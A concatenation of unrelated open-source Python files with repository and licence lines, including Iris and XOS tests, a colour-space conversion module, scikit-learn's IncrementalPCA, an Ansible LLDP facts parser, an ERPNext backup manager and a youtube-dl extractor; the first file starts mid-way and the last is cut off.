# fix up the dtype here if it is promotable from cube.dtype. We still
# want to catch cases where there is a loss of precision however.
if dual_stage.dtype > cube.dtype:
data = dual_stage.data.astype(cube.dtype)
dual_stage.data = data
self.assertCMLApproxData(dual_stage, ('cube_collapsed', '%s_%s_dual_stage.cml' % (a_filename, b_filename)), *args, **kwargs)
single_stage = cube.collapsed([a_name, b_name], iris.analysis.MEAN)
if single_stage.dtype > cube.dtype:
data = single_stage.data.astype(cube.dtype)
single_stage.data = data
self.assertCMLApproxData(single_stage, ('cube_collapsed', '%s_%s_single_stage.cml' % (a_filename, b_filename)), *args, **kwargs)
# Compare the cube bits that should match
self.partial_compare(dual_stage, single_stage)
@tests.skip_data
def test_multi_d(self):
cube = iris.tests.stock.realistic_4d()
# TODO: Re-instate surface_altitude & hybrid-height once we're
# using the post-CF test results.
cube.remove_aux_factory(cube.aux_factories[0])
cube.remove_coord('surface_altitude')
self.assertCML(cube, ('cube_collapsed', 'original.cml'))
# Compare 2-stage collapsing with a single stage collapse
# over 2 Coords.
self.collapse_test_common(cube, 'grid_latitude', 'grid_longitude',
rtol=1e-05)
self.collapse_test_common(cube, 'grid_longitude', 'grid_latitude',
rtol=1e-05)
self.collapse_test_common(cube, 'time', 'grid_latitude', rtol=1e-05)
self.collapse_test_common(cube, 'grid_latitude', 'time', rtol=1e-05)
self.collapse_test_common(cube, 'time', 'grid_longitude', rtol=1e-05)
self.collapse_test_common(cube, 'grid_longitude', 'time', rtol=1e-05)
self.collapse_test_common(cube, 'grid_latitude', 'model_level_number',
rtol=5e-04)
self.collapse_test_common(cube, 'model_level_number', 'grid_latitude',
rtol=5e-04)
self.collapse_test_common(cube, 'grid_longitude', 'model_level_number',
rtol=5e-04)
self.collapse_test_common(cube, 'model_level_number', 'grid_longitude',
rtol=5e-04)
self.collapse_test_common(cube, 'time', 'model_level_number',
rtol=5e-04)
self.collapse_test_common(cube, 'model_level_number', 'time',
rtol=5e-04)
self.collapse_test_common(cube, 'model_level_number', 'time',
rtol=5e-04)
self.collapse_test_common(cube, 'time', 'model_level_number',
rtol=5e-04)
# Collapse 3 things at once.
triple_collapse = cube.collapsed(['model_level_number',
'time', 'grid_longitude'],
iris.analysis.MEAN)
self.assertCMLApproxData(triple_collapse, ('cube_collapsed',
('triple_collapse_ml_pt_'
'lon.cml')),
rtol=5e-04)
triple_collapse = cube.collapsed(['grid_latitude',
'model_level_number', 'time'],
iris.analysis.MEAN)
self.assertCMLApproxData(triple_collapse, ('cube_collapsed',
('triple_collapse_lat_ml'
'_pt.cml')),
rtol=0.05)
# KNOWN PROBLEM: the previous 'rtol' is very large.
# Numpy 1.10 and 1.11 give significantly different results here.
# This may relate to known problems with summing over large arrays,
# which were largely fixed in numpy 1.9 but still occur in some cases,
# as-of numpy 1.11.
# Ensure no side effects
self.assertCML(cube, ('cube_collapsed', 'original.cml'))
@tests.skip_data
class TestTrimAttributes(tests.IrisTest):
def test_non_string_attributes(self):
cube = iris.tests.stock.realistic_4d()
attrib_key = "gorf"
attrib_val = 23
cube.attributes[attrib_key] = attrib_val
summary = cube.summary() # Get the cube summary
# Check through the lines of the summary to see that our attribute is there
attrib_re = re.compile("%s.*?%s" % (attrib_key, attrib_val))
for line in summary.split("\n"):
result = re.match(attrib_re, line.strip())
if result:
break
else: # No match found for our attribute
self.fail('Attribute not found in summary output of cube.')
@tests.skip_data
class TestMaskedData(tests.IrisTest, pp.PPTest):
def _load_3d_cube(self):
# This 3D data set has a missing a slice with SOME missing values.
# The missing data is in the pressure = 1000 hPa, forcast_period = 0,
# time = 1970-02-11 16:00:00 slice.
return iris.load_cube(tests.get_data_path(["PP", "mdi_handmade_small", "*.pp"]))
def test_complete_field(self):
# This pp field has no missing data values
cube = iris.load_cube(tests.get_data_path(["PP", "mdi_handmade_small", "mdi_test_1000_3.pp"]))
self.assertIsInstance(cube.data, np.ndarray)
def test_masked_field(self):
# This pp field has some missing data values
cube = iris.load_cube(tests.get_data_path(["PP", "mdi_handmade_small", "mdi_test_1000_0.pp"]))
self.assertIsInstance(cube.data, ma.core.MaskedArray)
def test_missing_file(self):
cube = self._load_3d_cube()
self.assertIsInstance(cube.data, ma.core.MaskedArray)
self.assertCML(cube, ('cdm', 'masked_cube.cml'))
def test_slicing(self):
cube = self._load_3d_cube()
# Test the slicing before deferred loading
full_slice = cube[3]
partial_slice = cube[0]
self.assertIsInstance(full_slice.data, np.ndarray)
self.assertIsInstance(partial_slice.data, ma.core.MaskedArray)
self.assertEqual(ma.count_masked(partial_slice.data), 25)
# Test the slicing is consistent after deferred loading
full_slice = cube[3]
partial_slice = cube[0]
self.assertIsInstance(full_slice.data, np.ndarray)
self.assertIsInstance(partial_slice.data, ma.core.MaskedArray)
self.assertEqual(ma.count_masked(partial_slice.data), 25)
def test_save_and_merge(self):
cube = self._load_3d_cube()
dtype = cube.dtype
fill_value = 123456
# extract the 2d field that has SOME missing values
masked_slice = cube[0]
masked_slice.data.fill_value = fill_value
# test saving masked data
reference_txt_path = tests.get_result_path(('cdm', 'masked_save_pp.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=masked_slice) as temp_pp_path:
iris.save(masked_slice, temp_pp_path)
# test merge keeps the mdi we just saved
cube1 = iris.load_cube(temp_pp_path)
self.assertEqual(cube1.dtype, dtype)
cube2 = cube1.copy()
# make cube1 and cube2 differ on a scalar coord, to make them mergeable into a 3d cube
cube2.coord("pressure").points = [1001.0]
merged_cubes = iris.cube.CubeList([cube1, cube2]).merge()
self.assertEqual(len(merged_cubes), 1, "expected a single merged cube")
merged_cube = merged_cubes[0]
self.assertEqual(merged_cube.dtype, dtype)
# Check that the original masked-array fill-value is *ignored*.
self.assertArrayAllClose(merged_cube.data.fill_value, -1e30)
@tests.skip_data
class TestConversionToCoordList(tests.IrisTest):
def test_coord_conversion(self):
cube = iris.tests.stock.realistic_4d()
# Single string
self.assertEqual(len(cube._as_list_of_coords('grid_longitude')), 1)
# List of string and unicode
self.assertEqual(len(cube._as_list_of_coords(['grid_longitude',
u'grid_latitude'], )), 2)
# Coord object(s)
lat = cube.coords("grid_latitude")[0]
lon = cube.coords("grid_longitude")[0]
self.assertEqual(len(cube._as_list_of_coords(lat)), 1)
self.assertEqual(len(cube._as_list_of_coords([lat, lon])), 2)
# Mix of string-like and coord
self.assertEqual(len(cube._as_list_of_coords(['grid_latitude', lon])),
2)
# Empty list
self.assertEqual(len(cube._as_list_of_coords([])), 0)
# Invalid coords
invalid_choices = [iris.analysis.MEAN, # Caused by mixing up argument order in call to cube.collasped for example
None,
['grid_latitude', None],
[lat, None],
]
for coords in invalid_choices:
with self.assertRaises(TypeError):
cube._as_list_of_coords(coords)
if __name__ == "__main__":
tests.main()
| lgpl-3.0 |
open-cloud/xos | lib/xos-api/tests/orm_reverse_relations.py | 2 | 2756 | # Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# These are functional tests of ManyToMany relations. These tests need to be conducted end-to-end with a real
# API to verify that the client and server ends of the API are working with each other.
from xosapi import xos_grpc_client
import sys
import unittest
orm = None
SERVICE_1_NAME = "test_service_1"
SERVICEINSTANCE_1_NAME = "test_service_instance_1"
SERVICE_2_NAME = "test_service_2"
SERVICEINSTANCE_2_NAME = "test_service_instance_2"
class TestORMReverseRelations(unittest.TestCase):
def setUp(self):
pass
def cleanup_models(self, cls, name):
objs = cls.objects.filter(name=name)
for obj in objs:
obj.delete()
def tearDown(self):
self.cleanup_models(orm.ServiceInstance, SERVICEINSTANCE_1_NAME)
self.cleanup_models(orm.ServiceInstance, SERVICEINSTANCE_2_NAME)
self.cleanup_models(orm.Service, SERVICE_1_NAME)
self.cleanup_models(orm.Service, SERVICE_2_NAME)
def test_reverse_relations(self):
service1 = orm.Service(name=SERVICE_1_NAME)
service1.save()
serviceinstance1 = orm.ServiceInstance(
name=SERVICEINSTANCE_1_NAME, owner=service1
)
serviceinstance1.save()
service2 = orm.Service(name=SERVICE_2_NAME)
service2.save()
serviceinstance2 = orm.ServiceInstance(
name=SERVICEINSTANCE_2_NAME, owner=service2
)
serviceinstance2.save()
link = orm.ServiceInstanceLink(
provider_service_instance=serviceinstance1,
subscriber_service_instance=serviceinstance2,
)
link.save()
si1_readback = orm.ServiceInstance.objects.get(id=serviceinstance1.id)
si2_readback = orm.ServiceInstance.objects.get(id=serviceinstance2.id)
self.assertEqual(si1_readback.provided_links.count(), 1)
self.assertEqual(si2_readback.subscribed_links.count(), 1)
def test_callback():
global orm
orm = xos_grpc_client.coreclient.xos_orm
sys.argv = sys.argv[:1] # unittest gets mad about the orm command line arguments
unittest.main()
xos_grpc_client.start_api_parseargs(test_callback)
| apache-2.0 |
RitwikGupta/CardboardVision | colorsys.py | 1 | 3639 |
#This modules provides two functions for each color system ABC:
# rgb_to_abc(r, g, b) --> a, b, c
# abc_to_rgb(a, b, c) --> r, g, b
#All inputs and outputs are triples of floats in the range [0.0...1.0]
#(with the exception of I and Q, which covers a slightly larger range).
#Inputs outside the valid range may cause exceptions or invalid outputs.
#Supported color systems:
#RGB: Red, Green, Blue components
#YIQ: Luminance, Chrominance (used by composite video signals)
#HLS: Hue, Luminance, Saturation
#HSV: Hue, Saturation, Value
# References:
# http://en.wikipedia.org/wiki/YIQ
# http://en.wikipedia.org/wiki/HLS_color_space
# http://en.wikipedia.org/wiki/HSV_color_space
__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",
"rgb_to_hsv","hsv_to_rgb"]
# Some floating point constants
ONE_THIRD = 1.0/3.0
ONE_SIXTH = 1.0/6.0
TWO_THIRD = 2.0/3.0
# YIQ: used by composite video signals (linear combinations of RGB)
# Y: perceived grey level (0.0 == black, 1.0 == white)
# I, Q: color components
def rgb_to_yiq(r, g, b):
y = 0.30*r + 0.59*g + 0.11*b
i = 0.60*r - 0.28*g - 0.32*b
q = 0.21*r - 0.52*g + 0.31*b
return (y, i, q)
def yiq_to_rgb(y, i, q):
r = y + 0.948262*i + 0.624013*q
g = y - 0.276066*i - 0.639810*q
b = y - 1.105450*i + 1.729860*q
if r < 0.0:
r = 0.0
if g < 0.0:
g = 0.0
if b < 0.0:
b = 0.0
if r > 1.0:
r = 1.0
if g > 1.0:
g = 1.0
if b > 1.0:
b = 1.0
return (r, g, b)
# HLS: Hue, Luminance, Saturation
# H: position in the spectrum
# L: color lightness
# S: color saturation
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
# XXX Can optimize (maxc+minc) and (maxc-minc)
l = (minc+maxc)/2.0
if minc == maxc:
return 0.0, l, 0.0
if l <= 0.5:
s = (maxc-minc) / (maxc+minc)
else:
s = (maxc-minc) / (2.0-maxc-minc)
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, l, s
def hls_to_rgb(h, l, s):
if s == 0.0:
return l, l, l
if l <= 0.5:
m2 = l * (1.0+s)
else:
m2 = l+s-(l*s)
m1 = 2.0*l - m2
return (_v(m1, m2, h+ONE_THIRD), _v(m1, m2, h), _v(m1, m2, h-ONE_THIRD))
def _v(m1, m2, hue):
hue = hue % 1.0
if hue < ONE_SIXTH:
return m1 + (m2-m1)*hue*6.0
if hue < 0.5:
return m2
if hue < TWO_THIRD:
return m1 + (m2-m1)*(TWO_THIRD-hue)*6.0
return m1
# HSV: Hue, Saturation, Value
# H: position in the spectrum
# S: color saturation ("purity")
# V: color brightness
def rgb_to_hsv(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
v = maxc
if minc == maxc:
return 0.0, 0.0, v
s = (maxc-minc) / maxc
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, s, v
def hsv_to_rgb(h, s, v):
if s == 0.0:
return v, v, v
i = int(h*6.0) # XXX assume int() truncates!
f = (h*6.0) - i
p = v*(1.0 - s)
q = v*(1.0 - s*f)
t = v*(1.0 - s*(1.0-f))
i = i%6
if i == 0:
return v, t, p
if i == 1:
return q, v, p
if i == 2:
return p, v, t
if i == 3:
return p, q, v
if i == 4:
return t, p, v
if i == 5:
return v, p, q
# Cannot get here
| gpl-2.0 |
rahuldhote/scikit-learn | sklearn/decomposition/incremental_pca.py | 199 | 10508 | """Incremental Principal Components Analysis."""
# Author: Kyle Kastner <kastnerkyle@gmail.com>
# License: BSD 3 clause
import numpy as np
from scipy import linalg
from .base import _BasePCA
from ..utils import check_array, gen_batches
from ..utils.extmath import svd_flip, _batch_mean_variance_update
class IncrementalPCA(_BasePCA):
"""Incremental principal components analysis (IPCA).
Linear dimensionality reduction using Singular Value Decomposition of
centered data, keeping only the most significant singular vectors to
project the data to a lower dimensional space.
Depending on the size of the input data, this algorithm can be much more
memory efficient than a PCA.
This algorithm has constant memory complexity, on the order
of ``batch_size``, enabling use of np.memmap files without loading the
entire file into memory.
The computational overhead of each SVD is
``O(batch_size * n_features ** 2)``, but only 2 * batch_size samples
remain in memory at a time. There will be ``n_samples / batch_size`` SVD
computations to get the principal components, versus 1 large SVD of
complexity ``O(n_samples * n_features ** 2)`` for PCA.
Read more in the :ref:`User Guide <IncrementalPCA>`.
Parameters
----------
n_components : int or None, (default=None)
Number of components to keep. If ``n_components `` is ``None``,
then ``n_components`` is set to ``min(n_samples, n_features)``.
batch_size : int or None, (default=None)
The number of samples to use for each batch. Only used when calling
``fit``. If ``batch_size`` is ``None``, then ``batch_size``
is inferred from the data and set to ``5 * n_features``, to provide a
balance between approximation accuracy and memory consumption.
copy : bool, (default=True)
If False, X will be overwritten. ``copy=False`` can be used to
save memory but is unsafe for general use.
whiten : bool, optional
When True (False by default) the ``components_`` vectors are divided
by ``n_samples`` times ``components_`` to ensure uncorrelated outputs
with unit component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometimes
improve the predictive accuracy of the downstream estimators by
making data respect some hard-wired assumptions.
Attributes
----------
components_ : array, shape (n_components, n_features)
Components with maximum variance.
explained_variance_ : array, shape (n_components,)
Variance explained by each of the selected components.
explained_variance_ratio_ : array, shape (n_components,)
Percentage of variance explained by each of the selected components.
If all components are stored, the sum of explained variances is equal
to 1.0
mean_ : array, shape (n_features,)
Per-feature empirical mean, aggregate over calls to ``partial_fit``.
var_ : array, shape (n_features,)
Per-feature empirical variance, aggregate over calls to ``partial_fit``.
noise_variance_ : float
The estimated noise covariance following the Probabilistic PCA model
from Tipping and Bishop 1999. See "Pattern Recognition and
Machine Learning" by C. Bishop, 12.2.1 p. 574 or
http://www.miketipping.com/papers/met-mppca.pdf.
n_components_ : int
The estimated number of components. Relevant when ``n_components=None``.
n_samples_seen_ : int
The number of samples processed by the estimator. Will be reset on
new calls to fit, but increments across ``partial_fit`` calls.
Notes
-----
Implements the incremental PCA model from:
`D. Ross, J. Lim, R. Lin, M. Yang, Incremental Learning for Robust Visual
Tracking, International Journal of Computer Vision, Volume 77, Issue 1-3,
pp. 125-141, May 2008.`
See http://www.cs.toronto.edu/~dross/ivt/RossLimLinYang_ijcv.pdf
This model is an extension of the Sequential Karhunen-Loeve Transform from:
`A. Levy and M. Lindenbaum, Sequential Karhunen-Loeve Basis Extraction and
its Application to Images, IEEE Transactions on Image Processing, Volume 9,
Number 8, pp. 1371-1374, August 2000.`
See http://www.cs.technion.ac.il/~mic/doc/skl-ip.pdf
We have specifically abstained from an optimization used by authors of both
papers, a QR decomposition used in specific situations to reduce the
algorithmic complexity of the SVD. The source for this technique is
`Matrix Computations, Third Edition, G. Holub and C. Van Loan, Chapter 5,
section 5.4.4, pp 252-253.`. This technique has been omitted because it is
advantageous only when decomposing a matrix with ``n_samples`` (rows)
>= 5/3 * ``n_features`` (columns), and hurts the readability of the
implemented algorithm. This would be a good opportunity for future
optimization, if it is deemed necessary.
References
----------
D. Ross, J. Lim, R. Lin, M. Yang. Incremental Learning for Robust Visual
Tracking, International Journal of Computer Vision, Volume 77,
Issue 1-3, pp. 125-141, May 2008.
G. Golub and C. Van Loan. Matrix Computations, Third Edition, Chapter 5,
Section 5.4.4, pp. 252-253.
See also
--------
PCA
RandomizedPCA
KernelPCA
SparsePCA
TruncatedSVD
"""
def __init__(self, n_components=None, whiten=False, copy=True,
batch_size=None):
self.n_components = n_components
self.whiten = whiten
self.copy = copy
self.batch_size = batch_size
def fit(self, X, y=None):
"""Fit the model with X, using minibatches of size batch_size.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
y: Passthrough for ``Pipeline`` compatibility.
Returns
-------
self: object
Returns the instance itself.
"""
self.components_ = None
self.mean_ = None
self.singular_values_ = None
self.explained_variance_ = None
self.explained_variance_ratio_ = None
self.noise_variance_ = None
self.var_ = None
self.n_samples_seen_ = 0
X = check_array(X, dtype=np.float)
n_samples, n_features = X.shape
if self.batch_size is None:
self.batch_size_ = 5 * n_features
else:
self.batch_size_ = self.batch_size
for batch in gen_batches(n_samples, self.batch_size_):
self.partial_fit(X[batch])
return self
def partial_fit(self, X, y=None):
"""Incremental fit with X. All of X is processed as a single batch.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
self: object
Returns the instance itself.
"""
X = check_array(X, copy=self.copy, dtype=np.float)
n_samples, n_features = X.shape
if not hasattr(self, 'components_'):
self.components_ = None
if self.n_components is None:
self.n_components_ = n_features
elif not 1 <= self.n_components <= n_features:
raise ValueError("n_components=%r invalid for n_features=%d, need "
"more rows than columns for IncrementalPCA "
"processing" % (self.n_components, n_features))
else:
self.n_components_ = self.n_components
if (self.components_ is not None) and (self.components_.shape[0]
!= self.n_components_):
raise ValueError("Number of input features has changed from %i "
"to %i between calls to partial_fit! Try "
"setting n_components to a fixed value." % (
self.components_.shape[0], self.n_components_))
if self.components_ is None:
# This is the first pass through partial_fit
self.n_samples_seen_ = 0
col_var = X.var(axis=0)
col_mean = X.mean(axis=0)
X -= col_mean
U, S, V = linalg.svd(X, full_matrices=False)
U, V = svd_flip(U, V, u_based_decision=False)
explained_variance = S ** 2 / n_samples
explained_variance_ratio = S ** 2 / np.sum(col_var *
n_samples)
else:
col_batch_mean = X.mean(axis=0)
col_mean, col_var, n_total_samples = _batch_mean_variance_update(
X, self.mean_, self.var_, self.n_samples_seen_)
X -= col_batch_mean
# Build matrix of combined previous basis and new data
mean_correction = np.sqrt((self.n_samples_seen_ * n_samples) /
n_total_samples) * (self.mean_ -
col_batch_mean)
X_combined = np.vstack((self.singular_values_.reshape((-1, 1)) *
self.components_, X,
mean_correction))
U, S, V = linalg.svd(X_combined, full_matrices=False)
U, V = svd_flip(U, V, u_based_decision=False)
explained_variance = S ** 2 / n_total_samples
explained_variance_ratio = S ** 2 / np.sum(col_var *
n_total_samples)
self.n_samples_seen_ += n_samples
self.components_ = V[:self.n_components_]
self.singular_values_ = S[:self.n_components_]
self.mean_ = col_mean
self.var_ = col_var
self.explained_variance_ = explained_variance[:self.n_components_]
self.explained_variance_ratio_ = \
explained_variance_ratio[:self.n_components_]
if self.n_components_ < n_features:
self.noise_variance_ = \
explained_variance[self.n_components_:].mean()
else:
self.noise_variance_ = 0.
return self
| bsd-3-clause |
toshywoshy/ansible | lib/ansible/module_utils/network/eos/facts/lldp_global/lldp_global.py | 21 | 2946 | #
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""
The eos lldp_global fact class
It is in this file the configuration is collected from the device
for a given resource, parsed, and the facts tree is populated
based on the configuration.
"""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
from copy import deepcopy
from ansible.module_utils.network.common import utils
from ansible.module_utils.network.eos.argspec.lldp_global.lldp_global import Lldp_globalArgs
class Lldp_globalFacts(object):
""" The eos lldp_global fact class
"""
def __init__(self, module, subspec='config', options='options'):
self._module = module
self.argument_spec = Lldp_globalArgs.argument_spec
spec = deepcopy(self.argument_spec)
if subspec:
if options:
facts_argument_spec = spec[subspec][options]
else:
facts_argument_spec = spec[subspec]
else:
facts_argument_spec = spec
self.generated_spec = utils.generate_dict(facts_argument_spec)
def populate_facts(self, connection, ansible_facts, data=None):
""" Populate the facts for lldp_global
:param connection: the device connection
:param ansible_facts: Facts dictionary
:param data: previously collected conf
:rtype: dictionary
:returns: facts
"""
if not data:
data = connection.get('show running-config | section lldp')
obj = {}
if data:
obj.update(self.render_config(self.generated_spec, data))
ansible_facts['ansible_network_resources'].pop('lldp_global', None)
facts = {}
if obj:
params = utils.validate_config(self.argument_spec, {'config': obj})
facts['lldp_global'] = utils.remove_empties(params['config'])
else:
facts['lldp_global'] = {}
ansible_facts['ansible_network_resources'].update(facts)
return ansible_facts
def render_config(self, spec, conf):
"""
Render config as dictionary structure and delete keys
from spec for null values
:param spec: The facts tree, generated from the argspec
:param conf: The configuration
:rtype: dictionary
:returns: The generated config
"""
config = deepcopy(spec)
config['holdtime'] = utils.parse_conf_arg(conf, 'holdtime')
config['reinit'] = utils.parse_conf_arg(conf, 'reinit')
config['timer'] = utils.parse_conf_arg(conf, 'timer')
for match in re.findall(r'^(no)? lldp tlv-select (\S+)', conf, re.MULTILINE):
tlv_option = match[1].replace("-", "_")
config['tlv_select'][tlv_option] = bool(match[0] != "no")
return utils.remove_empties(config)
| gpl-3.0 |
bravomikekilo/mxconsole | mxconsole/platform/sysconfig.py | 1 | 1840 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""System configuration library.
@@get_include
@@get_lib
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path as _os_path
from mxconsole.util.all_util import remove_undocumented
# pylint: disable=g-import-not-at-top
def get_include():
"""Get the directory containing the TensorFlow C++ header files.
Returns:
The directory as string.
"""
# Import inside the function.
# sysconfig is imported from the tensorflow module, so having this
# import at the top would cause a circular import, resulting in
# the tensorflow module missing symbols that come after sysconfig.
# from mxconsole.lib.native import pywrap_tensorflow_fs as tf
# import tensorflow as tf
return _os_path.join(_os_path.dirname(tf.__file__), 'include')
def get_lib():
"""Get the directory containing the TensorFlow framework library.
Returns:
The directory as string.
"""
# import tensorflow as tf
return _os_path.join(_os_path.dirname(tf.__file__), 'core')
_allowed_symbols = []
remove_undocumented(__name__, _allowed_symbols)
| apache-2.0 |
gangadharkadam/v4_erp | erpnext/setup/doctype/backup_manager/backup_manager.py | 37 | 2634 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.document import Document
class BackupManager(Document):
pass
def take_backups_daily():
take_backups_if("Daily")
def take_backups_weekly():
take_backups_if("Weekly")
def take_backups_if(freq):
if frappe.db.get_value("Backup Manager", None, "upload_backups_to_dropbox")==freq:
take_backups_dropbox()
# if frappe.db.get_value("Backup Manager", None, "upload_backups_to_gdrive")==freq:
# take_backups_gdrive()
@frappe.whitelist()
def take_backups_dropbox():
did_not_upload, error_log = [], []
try:
from erpnext.setup.doctype.backup_manager.backup_dropbox import backup_to_dropbox
did_not_upload, error_log = backup_to_dropbox()
if did_not_upload: raise Exception
send_email(True, "Dropbox")
except Exception:
file_and_error = [" - ".join(f) for f in zip(did_not_upload, error_log)]
error_message = ("\n".join(file_and_error) + "\n" + frappe.get_traceback())
frappe.errprint(error_message)
send_email(False, "Dropbox", error_message)
#backup to gdrive
@frappe.whitelist()
def take_backups_gdrive():
did_not_upload, error_log = [], []
try:
from erpnext.setup.doctype.backup_manager.backup_googledrive import backup_to_gdrive
did_not_upload, error_log = backup_to_gdrive()
if did_not_upload: raise Exception
send_email(True, "Google Drive")
except Exception:
file_and_error = [" - ".join(f) for f in zip(did_not_upload, error_log)]
error_message = ("\n".join(file_and_error) + "\n" + frappe.get_traceback())
frappe.errprint(error_message)
send_email(False, "Google Drive", error_message)
def send_email(success, service_name, error_status=None):
from frappe.utils.email_lib import sendmail
if success:
subject = "Backup Upload Successful"
message ="""<h3>Backup Uploaded Successfully</h3><p>Hi there, this is just to inform you
that your backup was successfully uploaded to your %s account. So relax!</p>
""" % service_name
else:
subject = "[Warning] Backup Upload Failed"
message ="""<h3>Backup Upload Failed</h3><p>Oops, your automated backup to %s
failed.</p>
<p>Error message: %s</p>
<p>Please contact your system manager for more information.</p>
""" % (service_name, error_status)
if not frappe.db:
frappe.connect()
recipients = frappe.db.get_value("Backup Manager", None, "send_notifications_to").split(",")
sendmail(recipients, subject=subject, msg=message)
| agpl-3.0 |
durai145/youtube-dl | youtube_dl/extractor/motorsport.py | 129 | 1797 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import (
compat_urlparse,
)
class MotorsportIE(InfoExtractor):
IE_DESC = 'motorsport.com'
_VALID_URL = r'http://www\.motorsport\.com/[^/?#]+/video/(?:[^/?#]+/)(?P<id>[^/]+)/?(?:$|[?#])'
_TEST = {
'url': 'http://www.motorsport.com/f1/video/main-gallery/red-bull-racing-2014-rules-explained/',
'info_dict': {
'id': '2-T3WuR-KMM',
'ext': 'mp4',
'title': 'Red Bull Racing: 2014 Rules Explained',
'duration': 208,
'description': 'A new clip from Red Bull sees Daniel Ricciardo and Sebastian Vettel explain the 2014 Formula One regulations – which are arguably the most complex the sport has ever seen.',
'uploader': 'mcomstaff',
'uploader_id': 'UC334JIYKkVnyFoNCclfZtHQ',
'upload_date': '20140903',
'thumbnail': r're:^https?://.+\.jpg$'
},
'add_ie': ['Youtube'],
'params': {
'skip_download': True,
},
}
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
iframe_path = self._html_search_regex(
r'<iframe id="player_iframe"[^>]+src="([^"]+)"', webpage,
'iframe path')
iframe = self._download_webpage(
compat_urlparse.urljoin(url, iframe_path), display_id,
'Downloading iframe')
youtube_id = self._search_regex(
r'www.youtube.com/embed/(.{11})', iframe, 'youtube id')
return {
'_type': 'url_transparent',
'display_id': display_id,
'url': 'https://youtube.com/watch?v=%s' % youtube_id,
}
| unlicense |
FEDEVEL/imx6rex-linux-3.10.17 | tools/perf/util/setup.py | 2079 | 1438 | #!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
libtraceevent = getenv('LIBTRACEEVENT')
liblk = getenv('LIBLK')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
extra_objects = [libtraceevent, liblk],
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
| gpl-2.0 |
rambo/Mindbandlogger | python/visualizer_chaco.py | 1 | 1479 | #!/usr/bin/env python
import sys,os
import reader
# boilerplate
from enthought.traits.api import HasTraits, Instance
from enthought.traits.ui.api import View, Item
from enthought.chaco.api import Plot, ArrayPlotData
from enthought.enable.component_editor import ComponentEditor
from numpy import linspace, sin, array, append
class LinePlot(HasTraits):
plot = Instance(Plot)
traits_view = View(
Item('plot',editor=ComponentEditor(), show_label=False),
width=500, height=500, resizable=True, title="Chaco Plot")
def __init__(self, dataiterator):
super(LinePlot, self).__init__()
xarr = None
yarr = None
for x,y in dataiterator:
if xarr == None:
xarr = array(x)
else:
xarr = append(xarr, x)
if yarr == None:
yarr = array(y)
else:
yarr = append(yarr, y)
print xarr
print yarr
# mangle the X for now, chaco seeminly can't handle datetimes
xarr = array(xrange(len(yarr)))
plotdata = ArrayPlotData(x=xarr,y=yarr)
plot = Plot(plotdata)
plot.plot(("x", "y"), type="line", color="blue")
plot.title = "EEG plot"
self.plot = plot
if __name__ == "__main__":
if (len(sys.argv) < 1):
exit(1)
fp = open(sys.argv[1], 'rb')
reader = reader.rawiterator(fp)
myplot = LinePlot(reader)
myplot.configure_traits()
| gpl-3.0 |
tcwicklund/django | django/utils/deconstruct.py | 502 | 2047 | from importlib import import_module
from django.utils.version import get_docs_version
